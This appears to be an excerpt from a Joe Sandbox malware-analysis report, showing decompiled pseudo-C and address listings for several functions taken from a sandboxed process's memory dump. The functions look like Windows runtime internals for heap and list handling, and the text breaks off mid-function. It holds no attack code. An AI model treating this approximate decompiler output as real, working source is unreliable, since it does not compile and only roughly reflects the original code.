                                  • API String ID:
                                  • Opcode ID: 5ffa0563f1476078c42d18a1bf5a0f2875a1fd9b1f1c04f82801baf444298b39
                                  • Instruction ID: 2c04e7e90209fb2990007eb59685d5e53768258d5d950e606ff8f6a2d55995b2
                                  • Opcode Fuzzy Hash: 5ffa0563f1476078c42d18a1bf5a0f2875a1fd9b1f1c04f82801baf444298b39
                                  • Instruction Fuzzy Hash: 6A311331241711AFC725EF28EC41B26B7B5BF41769F26465AE9264F2F0D720E801CA94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0351A61C Relevance: .1, Instructions: 106COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 78%
                                  			E0351A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x35c0220);
				E0353D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x35d7b9c; // 0x0
				_t55 = L03504620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0353D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x35d7b10 =  *0x35d7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x35d536c; // 0xb43e08
					if( *_t51 != 0x35d5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x35d5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x35d536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0351A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                  0x0351a61c
                                  0x0351a61e
                                  0x0351a623
                                  0x0351a628
                                  0x0351a62b
                                  0x0351a62d
                                  0x0351a648
                                  0x0351a64a
                                  0x0351a64f
                                  0x03559b44
                                  0x0351a6ec
                                  0x0351a6f1
                                  0x0351a6f1
                                  0x0351a655
                                  0x0351a657
                                  0x0351a65a
                                  0x0351a65d
                                  0x0351a662
                                  0x0351a663
                                  0x0351a667
                                  0x0351a668
                                  0x0351a66d
                                  0x0351a706
                                  0x0351a706
                                  0x03559bda
                                  0x03559be6
                                  0x03559beb
                                  0x00000000
                                  0x03559beb
                                  0x0351a679
                                  0x03559b7a
                                  0x00000000
                                  0x03559b7a
                                  0x0351a683
                                  0x0351a6f4
                                  0x0351a6f7
                                  0x0351a6f9
                                  0x0351a6fd
                                  0x0351a6a0
                                  0x0351a6a0
                                  0x0351a6ad
                                  0x0351a6af
                                  0x0351a6b4
                                  0x03559ba7
                                  0x03559bac
                                  0x00000000
                                  0x00000000
                                  0x03559bc6
                                  0x03559bce
                                  0x03559bd1
                                  0x03559bd3
                                  0x03559bd3
                                  0x00000000
                                  0x03559bd1
                                  0x0351a6bd
                                  0x0351a6c3
                                  0x0351a6c6
                                  0x0351a6d2
                                  0x0351a701
                                  0x0351a704
                                  0x00000000
                                  0x0351a704
                                  0x0351a6d4
                                  0x0351a6d6
                                  0x0351a6d9
                                  0x0351a6db
                                  0x0351a6e1
                                  0x0351a6e6
                                  0x0351a6e8
                                  0x0351a6e8
                                  0x0351a6ea
                                  0x00000000
                                  0x0351a6ea
                                  0x0351a688
                                  0x0351a692
                                  0x0351a694
                                  0x0351a699
                                  0x00000000
                                  0x00000000
                                  0x0351a69d
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1f6cc95546b3fe98f1c317f0471986dedb11aeb26befb3b609ea68d8e099c584
                                  • Instruction ID: 09fc3c7a2bf588e732b5f04a61e7c464c8e50630b5e65c938c6aaed5f1cac493
                                  • Opcode Fuzzy Hash: 1f6cc95546b3fe98f1c317f0471986dedb11aeb26befb3b609ea68d8e099c584
                                  • Instruction Fuzzy Hash: E2419DB5A01305DFDB15CF58E490B9DB7F1BB89310F19806AE804AF365D378A951CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03523D43 Relevance: .1, Instructions: 106COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E03523D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E034F7B60(0, _t61, 0x34c11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E034F7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L03504620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                  0x03523d4c
                                  0x03523d50
                                  0x03523d55
                                  0x03523d5e
                                  0x0355e79a
                                  0x00000000
                                  0x0355e79a
                                  0x03523d68
                                  0x0355e789
                                  0x03523d9d
                                  0x03523da3
                                  0x03523daf
                                  0x03523db5
                                  0x03523dbc
                                  0x03523dc4
                                  0x03523dc9
                                  0x03523dce
                                  0x0355e7ae
                                  0x0355e7ae
                                  0x03523dde
                                  0x03523de2
                                  0x03523de7
                                  0x03523e0d
                                  0x03523e13
                                  0x03523e16
                                  0x03523e1e
                                  0x03523e25
                                  0x03523e28
                                  0x00000000
                                  0x00000000
                                  0x03523e2a
                                  0x03523e2f
                                  0x03523e37
                                  0x03523e37
                                  0x00000000
                                  0x03523e37
                                  0x03523e31
                                  0x00000000
                                  0x03523e31
                                  0x03523e20
                                  0x03523e20
                                  0x03523e35
                                  0x00000000
                                  0x03523de9
                                  0x03523de9
                                  0x03523de9
                                  0x03523dee
                                  0x03523dfd
                                  0x03523dff
                                  0x03523e02
                                  0x03523e05
                                  0x03523e05
                                  0x00000000
                                  0x03523df0
                                  0x03523de7
                                  0x0355e78f
                                  0x0355e794
                                  0x03523d79
                                  0x03523d84
                                  0x03523d89
                                  0x03523d8e
                                  0x00000000
                                  0x0355e7a4
                                  0x03523d96
                                  0x03523d9a
                                  0x00000000
                                  0x03523d9a
                                  0x00000000
                                  0x0355e794
                                  0x03523d6e
                                  0x03523d73
                                  0x00000000
                                  0x0355e7b5
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6c63ab20da0eb8ff21713cfdbfcaaf3f08a269dea05b01c984cf32901fc8d37f
                                  • Instruction ID: fe3c37dcc52f9bccae0fe003d01741ec20c053dc3cbbd3cc404d8e5976152566
                                  • Opcode Fuzzy Hash: 6c63ab20da0eb8ff21713cfdbfcaaf3f08a269dea05b01c984cf32901fc8d37f
                                  • Instruction Fuzzy Hash: F031A339A046659BC724CF29E452A7ABFB5FF4674070A846EE845CB3A0E638D840C790
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0350C182 Relevance: .1, Instructions: 104COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E0350C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E03507D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E035B8D34(_v8, _t80);
					}
					E03502280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E034FFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E035B8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E034FFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0352B180();
						if(_a4 != 0) {
							E03502280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0350BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0350BB2D(_t16, _t15);
						E0350B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E034FFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E034FFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E034FFFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                  0x0350c18d
                                  0x0350c18f
                                  0x0350c191
                                  0x0350c19b
                                  0x0350c1a0
                                  0x0350c1d4
                                  0x0350c1de
                                  0x03552d6e
                                  0x0350c1e4
                                  0x0350c1e4
                                  0x0350c1e4
                                  0x0350c1ec
                                  0x03552d7d
                                  0x03552d7d
                                  0x0350c1f3
                                  0x0350c1ff
                                  0x03552d88
                                  0x03552d8d
                                  0x03552d94
                                  0x03552d94
                                  0x03552d9f
                                  0x03552da4
                                  0x03552dab
                                  0x03552db0
                                  0x03552db2
                                  0x03552db3
                                  0x03552db4
                                  0x03552dbc
                                  0x03552dc3
                                  0x03552dc3
                                  0x0350c205
                                  0x0350c205
                                  0x0350c208
                                  0x0350c20e
                                  0x0350c211
                                  0x0350c216
                                  0x0350c219
                                  0x0350c21f
                                  0x0350c222
                                  0x0350c22c
                                  0x0350c234
                                  0x0350c23a
                                  0x0350c23f
                                  0x0350c245
                                  0x0350c24b
                                  0x0350c251
                                  0x0350c25a
                                  0x0350c276
                                  0x0350c27d
                                  0x0350c27d
                                  0x0350c25c
                                  0x0350c25c
                                  0x00000000
                                  0x0350c25e
                                  0x0350c1a4
                                  0x0350c1aa
                                  0x0350c1b3
                                  0x0350c265
                                  0x0350c26c
                                  0x0350c26c
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                  • Instruction ID: ee19dc76a3c13c6f1584db948ab695c48a81a9ce63849e0959857bdeb2bc7a03
                                  • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                  • Instruction Fuzzy Hash: 32312875601687AFD704EBB4D490BE9F764BF82200F08465BD5184F3A1DB366A0AC7A0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03567016 Relevance: .1, Instructions: 104COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 76%
                                  			E03567016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x35dd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E03566B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E03566B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E03507D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E03529AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0352B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L03504620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                  0x03567016
                                  0x0356701e
                                  0x0356702b
                                  0x03567033
                                  0x03567037
                                  0x0356703c
                                  0x0356703e
                                  0x03567041
                                  0x03567045
                                  0x0356704a
                                  0x03567050
                                  0x03567055
                                  0x0356705a
                                  0x03567062
                                  0x03567062
                                  0x0356705a
                                  0x03567064
                                  0x03567064
                                  0x03567067
                                  0x03567071
                                  0x03567096
                                  0x0356709b
                                  0x035670a2
                                  0x035670a6
                                  0x035670a7
                                  0x035670ad
                                  0x035670b3
                                  0x035670b6
                                  0x035670bb
                                  0x035670c3
                                  0x035670c3
                                  0x035670c6
                                  0x035670cd
                                  0x035670dd
                                  0x035670e0
                                  0x035670e2
                                  0x035670e2
                                  0x035670ee
                                  0x03567101
                                  0x035670f0
                                  0x035670f9
                                  0x035670f9
                                  0x0356710a
                                  0x0356710e
                                  0x03567112
                                  0x03567117
                                  0x03567118
                                  0x03567118
                                  0x035670bb
                                  0x0356711d
                                  0x03567123
                                  0x03567131
                                  0x03567131
                                  0x03567136
                                  0x0356713d
                                  0x0356713e
                                  0x0356713f
                                  0x0356714a
                                  0x0356714a
                                  0x03567084
                                  0x03567088
                                  0x00000000
                                  0x0356708e
                                  0x0356708e
                                  0x03567092
                                  0x00000000
                                  0x03567092

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fe3831524bfea126a5dbd7150b015c5b3558938fdbac75f3b9ba598f9c87312d
                                  • Instruction ID: 43f25136f9fca91325c59e62ad02ca4469552c764b33ce4f1c5b4c5da3c8b945
                                  • Opcode Fuzzy Hash: fe3831524bfea126a5dbd7150b015c5b3558938fdbac75f3b9ba598f9c87312d
                                  • Instruction Fuzzy Hash: C93193766047919BC320DF28D941A6AB7F5FFC8714F084A2DF8958B6A0E731E904CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03593D40 Relevance: .1, Instructions: 98COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 70%
                                  			E03593D40(intOrPtr __ecx, char* __edx) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed char _v24;
				char _v28;
				char _v29;
				intOrPtr* _v32;
				char _v36;
				char _v37;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t34;
				intOrPtr* _t37;
				intOrPtr* _t42;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				char _t51;
				void* _t52;
				intOrPtr* _t53;
				char* _t55;
				char _t59;
				char* _t61;
				intOrPtr* _t64;
				void* _t65;
				char* _t67;
				void* _t68;
				signed int _t70;

				_t62 = __edx;
				_t72 = (_t70 & 0xfffffff8) - 0x1c;
				_v8 =  *0x35dd360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
				_t34 =  &_v28;
				_v20 = __ecx;
				_t67 = __edx;
				_v24 = _t34;
				_t51 = 0;
				_v12 = __edx;
				_v29 = 0;
				_v28 = _t34;
				E03502280(_t34, 0x35d8a6c);
				_t64 =  *0x35d5768; // 0x771c5768
				if(_t64 != 0x35d5768) {
					while(1) {
						_t8 = _t64 + 8; // 0x771c5770
						_t42 = _t8;
						_t53 = _t64;
						 *_t42 =  *_t42 + 1;
						_v16 = _t42;
						E034FFFB0(_t53, _t64, 0x35d8a6c);
						 *0x35db1e0(_v24, _t67);
						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
							_v37 = 1;
						}
						E03502280(_t45, 0x35d8a6c);
						_t47 = _v28;
						_t64 =  *_t64;
						 *_t47 =  *_t47 - 1;
						if( *_t47 != 0) {
							goto L8;
						}
						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
							L10:
							_push(3);
							asm("int 0x29");
						} else {
							_t48 =  *((intOrPtr*)(_t53 + 4));
							if( *_t48 != _t53) {
								goto L10;
							} else {
								 *_t48 = _t64;
								_t61 =  &_v36;
								 *((intOrPtr*)(_t64 + 4)) = _t48;
								_t49 = _v32;
								if( *_t49 != _t61) {
									goto L10;
								} else {
									 *_t53 = _t61;
									 *((intOrPtr*)(_t53 + 4)) = _t49;
									 *_t49 = _t53;
									_v32 = _t53;
									goto L8;
								}
							}
						}
						L11:
						_t51 = _v29;
						goto L12;
						L8:
						if(_t64 != 0x35d5768) {
							_t67 = _v20;
							continue;
						}
						goto L11;
					}
				}
				L12:
				E034FFFB0(_t51, _t64, 0x35d8a6c);
				while(1) {
					_t37 = _v28;
					_t55 =  &_v28;
					if(_t37 == _t55) {
						break;
					}
					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
						goto L10;
					} else {
						_t59 =  *_t37;
						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
							goto L10;
						} else {
							_t62 =  &_v28;
							_v28 = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
							L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
							continue;
						}
					}
					L18:
				}
				_pop(_t65);
				_pop(_t68);
				_pop(_t52);
				return E0352B640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
				goto L18;
			}

































                                  0x03593d40
                                  0x03593d48
                                  0x03593d52
                                  0x03593d59
                                  0x03593d5d
                                  0x03593d61
                                  0x03593d63
                                  0x03593d67
                                  0x03593d69
                                  0x03593d72
                                  0x03593d76
                                  0x03593d7a
                                  0x03593d7f
                                  0x03593d8b
                                  0x03593d91
                                  0x03593d91
                                  0x03593d91
                                  0x03593d94
                                  0x03593d96
                                  0x03593d9d
                                  0x03593da1
                                  0x03593db0
                                  0x03593dba
                                  0x03593dbc
                                  0x03593dbc
                                  0x03593dc6
                                  0x03593dcb
                                  0x03593dcf
                                  0x03593dd1
                                  0x03593dd4
                                  0x00000000
                                  0x00000000
                                  0x03593dd9
                                  0x03593e0c
                                  0x03593e0c
                                  0x03593e0f
                                  0x03593ddb
                                  0x03593ddb
                                  0x03593de0
                                  0x00000000
                                  0x03593de2
                                  0x03593de2
                                  0x03593de4
                                  0x03593de8
                                  0x03593deb
                                  0x03593df1
                                  0x00000000
                                  0x03593df3
                                  0x03593df3
                                  0x03593df5
                                  0x03593df8
                                  0x03593dfa
                                  0x00000000
                                  0x03593dfa
                                  0x03593df1
                                  0x03593de0
                                  0x03593e11
                                  0x03593e11
                                  0x00000000
                                  0x03593dfe
                                  0x03593e04
                                  0x03593e06
                                  0x00000000
                                  0x03593e06
                                  0x00000000
                                  0x03593e04
                                  0x03593d91
                                  0x03593e15
                                  0x03593e1a
                                  0x03593e1f
                                  0x03593e1f
                                  0x03593e23
                                  0x03593e29
                                  0x00000000
                                  0x00000000
                                  0x03593e2e
                                  0x00000000
                                  0x03593e30
                                  0x03593e30
                                  0x03593e35
                                  0x00000000
                                  0x03593e37
                                  0x03593e3e
                                  0x03593e42
                                  0x03593e48
                                  0x03593e4e
                                  0x00000000
                                  0x03593e4e
                                  0x03593e35
                                  0x00000000
                                  0x03593e2e
                                  0x03593e5b
                                  0x03593e5c
                                  0x03593e5d
                                  0x03593e68
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 323c1694b989c3061acd0490d4cf9c0ff285b6333bf2d6daf90700d3423c83b7
                                  • Instruction ID: 987df06b65842c6f9f18a5b8868fc2aa9e9505af408b660026270c8582e4941e
                                  • Opcode Fuzzy Hash: 323c1694b989c3061acd0490d4cf9c0ff285b6333bf2d6daf90700d3423c83b7
                                  • Instruction Fuzzy Hash: 7E31AE79509302DFCB20DF58E58195ABBF5FF85710F0949AEE4948B261D330ED09CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0351A70E Relevance: .1, Instructions: 96COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 92%
                                  			E0351A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x35d7b10; // 0x8
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x35d7b10 = 8;
					 *0x35d7b14 = 0x35d7b0c;
					 *0x35d7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x9
					E0351A990(0x35d7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0351A840(__edx, __ecx, __ecx, _t52, 0x35d7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x35d7b10; // 0x8
					_t3 = _t37 + 0x27; // 0x2f
					__eflags = _t3 >> 5 -  *0x35d7b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x35d7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x2f
						_v8 = _t4 >> 5;
						_t50 = L03504620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x35d7b18 = _v8;
						_t8 = _t52 + 7; // 0xf
